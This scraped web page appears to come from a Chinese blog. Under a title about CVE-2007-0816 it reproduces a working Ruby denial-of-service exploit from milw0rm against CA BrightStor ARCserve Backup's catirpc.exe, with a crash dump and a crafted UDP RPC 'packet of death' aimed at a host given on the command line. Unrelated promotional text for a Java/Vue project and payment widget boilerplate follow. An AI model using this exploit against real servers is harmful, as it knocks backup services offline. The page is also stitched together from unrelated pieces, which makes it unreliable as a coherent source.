cati服务器授权信息无效,CVE-2007-0816 CA BrightStor ARCserve Backup catirpc.exe远程拒绝服务漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安...

#!/usr/bin/ruby

#

# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)

#

# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.

#

# (7c.350): Access violation - code c0000005 (!!! second chance !!!)

# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308

# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0 nv up ei pl nz na po nc

# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206

# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve

# Backup\CATIRPC.dll

# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program

# Files\CA\BrightStor ARCserve Backup\CATIRPC.dll -

# CATIRPC_2e000000!get_hostbyname+478:

# 2e00eda8 668b4602 mov ax,[esi+0x2] ds:0023:00000002=????

#

# CATIRPC.dll does not properly handle TADDR2UADDR procedures used in RPC communications with

# the CA RPC Server (Catirpc.exe). This leads to a condition where a null memory pointer

# is dereferenced. This appears to be only a DoS, but please prove me otherwise. This was tested on

# BrightStor ARCserve Backup 11.5.2.0 (SP2)

#

# (c) Copyright 2007 Shirkdog i

#

# Author: M. Shirk (Shirkdog) shirkdog_list ^ at % hotmail.com

# Thanks to Tebodell for testing

#

# Greetz to str0ke, Galileo. Metasploit module to follow

require 'socket'

backup_server = (ARGV[0])

target_port = (ARGV[1] || 111)

#RPC/Portmap packet

packet_of_death=

"\xde\xad\xbe\xef" + # XID

"\x00\x00\x00\x00" + # Message Type: Call (0)

"\x00\x00\x00\x02" + # RPC Version: 2

"\x00\x01\x86\xa0" + # Program: Portmap

"\x00\x00\x00\x03" + # Program Version: 3

"\x00\x00\x00\x08" + # Procedure: TADDR2UADDR (8)

"\x00\x00\x00\x00\x00\x00\x00\x00" +

"\x00\x00\x00\x00\x00\x00\x00\x00" + #Credentials and Verifier all NULL

"\x46\x9b\x22\xe2" + # Portmap data

"\x00\x00\x00\x00" + # Nulls that get processed during address shifting

"\x00\x00\x00\x00" +

"\x00\x00\x00\x00"

puts "[+]Computer Associates (CA) Brightstor ARCServe Backup Remote Procedure Call Server DoS (catirpc.dll)\n"

puts "[+]Author: Shirkdog\n\n"

if (!(backup_server && target_port))

puts "Usage: catirpcdos.rb host port (default port: 111)\n"

exit

else

puts "[+]Sending UDP Packet of Death...\n"

sock = UDPSocket.open

sock.connect(backup_server, target_port.to_i)

sock.send(packet_of_death, 0)

puts "[+]Done...\n[+]Catirpc.exe is dead\n[+]... or it will die in a few seconds for you inpatient bastards\n"

end

# milw0rm.com [2007-02-01]

技术选型 【后端】:Java 【框架】:springboot 【前端】:vue 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 项目包含前后台完整源码。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章或私聊获取 助力学习实践,提升编程技能,快来获取这份宝贵的资源吧! 在当今快速发展的信息技术领域,技术选型是决定一个项目成功与否的重要因素之一。基于以下的技术栈,我们为您带来了一份完善且经过实践验证的项目资源,让您在学习和提升编程技能的道路上事半功倍。以下是该项目的技术选型和其组件的详细介绍。 在后端技术方面,我们选择了Java作为编程语言。Java以其稳健性、跨平台性和丰富的库支持,在企业级应用中处于领导地位。项目采用了流行的Spring Boot框架,这个框架以简化Java企业级开发而闻名。Spring Boot提供了简洁的配置方式、内置的嵌入式服务器支持以及强大的生态系统,使开发者能够更高效地构建和部署应用。 前端技术方面,我们使用了Vue.js,这是一个用于构建用户界面的渐进式JavaScript框架。Vue以其易上手、灵活和性能出色而受到开发者的青睐,它的组件化开发思想也有助于提高代码的复用性和可维护性。 项目的编译和运行环境选择了JDK 1.8。尽管Java已经推出了更新的版本,但JDK 1.8依旧是一种成熟且稳定的选择,广泛应用于各类项目中,确保了兼容性和稳定性。 在服务器方面,本项目部署在Tomcat 7+之上。Tomcat是Apache软件基金会下的一个开源Servlet容器,也是应用最为广泛的Java Web服务器之一。其稳定性和可靠的性能表现为Java Web应用提供了坚实的支持。 数据库方面,我们采用了MySQL 5.7+。MySQL是一种高效、可靠且使用广泛的关系型数据库管理系统,5.7版本在性能和功能上都有显著的提升。 值得一提的是,该项目包含了前后台的完整源码,并经过严格调试,确保可以顺利运行。通过项目的学习和实践,您将能更好地掌握从后端到前端的完整开发流程,提升自己的编程技能。欢迎参考博主的详细文章或私信获取更多信息,利用这一宝贵资源来推进您的技术成长之路!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值